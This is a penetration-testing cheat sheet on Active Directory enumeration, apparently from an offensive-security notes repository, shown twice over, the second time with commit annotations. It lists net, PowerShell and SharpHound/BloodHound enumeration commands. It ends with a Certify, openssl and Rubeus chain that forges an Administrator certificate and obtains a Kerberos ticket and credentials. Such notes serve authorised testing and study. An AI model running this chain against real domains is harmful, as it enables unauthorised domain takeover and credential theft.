killchain-compendium/Miscellaneous/Active Directory/ad_enumeration.md

# Enumerate Active Directory

Enumeration following after initial credentials are gained


## SYSVOL

* On windows use `runas` and gain local administrative permissions via
```sh
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
```
* Check validity of credentials against `SYSVOL`, it stores __Group Policy Objects (GPO)__. Every AD account will gain access
    * Query DNS, for example the DC
```sh
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```
    * Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth
```sh
dir \\%HOSTNAME%\SYSVOL\
```
    * Check `SYSVOL` via `IP` address to force `NTLM` authentication

## Microsoft Management Console (MMC)

* Use AD Snap-ins of `Remote Server Administrative Tools`
    * Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search `RSAT` -> Select `RSAT: Active Directory Domain Services and Lightweight Directory Tools` -> Install
    * `Win` + `r` -> `MMC` -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click `Active Directory Sites and Services` -> `Change Forest` -> Add root domain -> right click `Active Directory Users and Computers` -> Change Domain -> enter root domain -> right click `Active Directory Users and Computers ` -> View -> Advanced Features
    * Start enumerating via click on the domain object in the tree on the left
    * Take a look at `People` directory -> right click on them to see properties
    * Change or create user or change groups 
    * Also use `MMC` to enumerate 

## CMD enumeration

Execute from domain joined machine

* Users
```sh
net user /domain
```
* Specific user
```sh
net user <username> /domain
```
* Groups
```sh
net group /domain
```
* Specific group
```sh
net group <groupname> /domain
```
* Password Policy via accounts
```sh
net accounts /domain
```

## Powershell Cmdlets

* User details via
```sh
 Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
```
* Groups
```sh
Get-ADGroup -Identity Administrators -Server exampleDC.com  -Properties *
```
* Group membership
```sh
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
```
* Generic AD objects
```sh
Get-ADObject -Filter <filterstuff>  -includeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
```
* Domains
```sh
 Get-ADDomain -Server exampleDC.com
``` 

## Sharphound and Bloodhound

* [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/index.html#)

* Change to AD user via `runas.exe` and collect via one of the following
    * Sharphound.ps1
    * sharphound.exe
    * Azurehound.ps1
 
* For example
```sh
Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
```
* After some time collect the current sessions via
```sh
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
```
* Start neo4j db
```sh
neo4j console start
```
* Start bloodhound
```sh
bloodhound --no-sandbox
```
* Drag and Drop the zip file from Sharphound
* Either search for AD objects and use `Analysis` to find an attack path through the info on the edges
* Shows exploitable accounts in the `Analysis` tab, for example kerberroastable accounts

## LDAP

## PowerView 

## WMI

## Find Certifications and Private Keys

Certification Services can be found with [the Certify tool](https://github.com/GhostPack/Certify.git).

* Enumerate vunerabilities on the current user via Certify, use `FullName` found in the first step to insert domain in the second step
```sh
Certify.exe find /vulnerable /currentuser
.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
```

* Copy the found key and convert it like mentioned in the last line of the ouptut, for example
```sh
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

* Get ticket with the the loot via Rubeus
```
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
```
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			`# Enumerate Active Directory`

			`Enumeration following after initial credentials are gained`


			`## SYSVOL`

			* On windows use `runas` and gain local administrative permissions via
			```sh
			`runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe`
			```
			* Check validity of credentials against `SYSVOL`, it stores __Group Policy Objects (GPO)__. Every AD account will gain access
			`* Query DNS, for example the DC`
			```sh
			`$dnsip = "<DC IPaddress>"`
			`$index = Get-NetAdapter -Name '<Ethernet>' \| Select-Object -ExpandProperty 'ifIndex'`
			`Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip`
			```
			* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth
			```sh
			`dir \\%HOSTNAME%\SYSVOL\`
			```
			* Check `SYSVOL` via `IP` address to force `NTLM` authentication

			`## Microsoft Management Console (MMC)`

			* Use AD Snap-ins of `Remote Server Administrative Tools`
			* Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search `RSAT` -> Select `RSAT: Active Directory Domain Services and Lightweight Directory Tools` -> Install
			* `Win` + `r` -> `MMC` -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click `Active Directory Sites and Services` -> `Change Forest` -> Add root domain -> right click `Active Directory Users and Computers` -> Change Domain -> enter root domain -> right click `Active Directory Users and Computers ` -> View -> Advanced Features
			`* Start enumerating via click on the domain object in the tree on the left`
			* Take a look at `People` directory -> right click on them to see properties
			`* Change or create user or change groups`
			* Also use `MMC` to enumerate

			`## CMD enumeration`

			`Execute from domain joined machine`

			`* Users`
			```sh
			`net user /domain`
			```
			`* Specific user`
			```sh
			`net user <username> /domain`
			```
			`* Groups`
			```sh
			`net group /domain`
			```
			`* Specific group`
			```sh
			`net group <groupname> /domain`
			```
			`* Password Policy via accounts`
			```sh
			`net accounts /domain`
			```

			`## Powershell Cmdlets`

			`* User details via`
			```sh
			`Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *`
			```
			`* Groups`
			```sh
			`Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *`
			```
			`* Group membership`
			```sh
			`Get-ADGroupMember -Identity Administrators -Server exampleDC.com`
			```
			`* Generic AD objects`
			```sh
			`Get-ADObject -Filter <filterstuff> -includeDeletedObjects -Server exampleDC.com`
			`Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com`
			```
			`* Domains`
			```sh
			`Get-ADDomain -Server exampleDC.com`
			```

			`## Sharphound and Bloodhound`

			`* [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/index.html#)`

			* Change to AD user via `runas.exe` and collect via one of the following
			`* Sharphound.ps1`
			`* sharphound.exe`
			`* Azurehound.ps1`

			`* For example`
			```sh
			`Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs`
			```
			`* After some time collect the current sessions via`
			```sh
			`Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs`
			```
			`* Start neo4j db`
			```sh
			`neo4j console start`
			```
			`* Start bloodhound`
			```sh
			`bloodhound --no-sandbox`
			```
			`* Drag and Drop the zip file from Sharphound`
			* Either search for AD objects and use `Analysis` to find an attack path through the info on the edges
			* Shows exploitable accounts in the `Analysis` tab, for example kerberroastable accounts

			`## LDAP`

			`## PowerView`

			`## WMI`
bump 2023-03-25 15:31:51 +01:00
			`## Find Certifications and Private Keys`

			`Certification Services can be found with [the Certify tool](https://github.com/GhostPack/Certify.git).`

			* Enumerate vunerabilities on the current user via Certify, use `FullName` found in the first step to insert domain in the second step
			```sh
			`Certify.exe find /vulnerable /currentuser`
			`.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator`
			```

			`* Copy the found key and convert it like mentioned in the last line of the ouptut, for example`
			```sh
			`openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx`
			```

			`* Get ticket with the the loot via Rubeus`
			```
			`.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials`
			```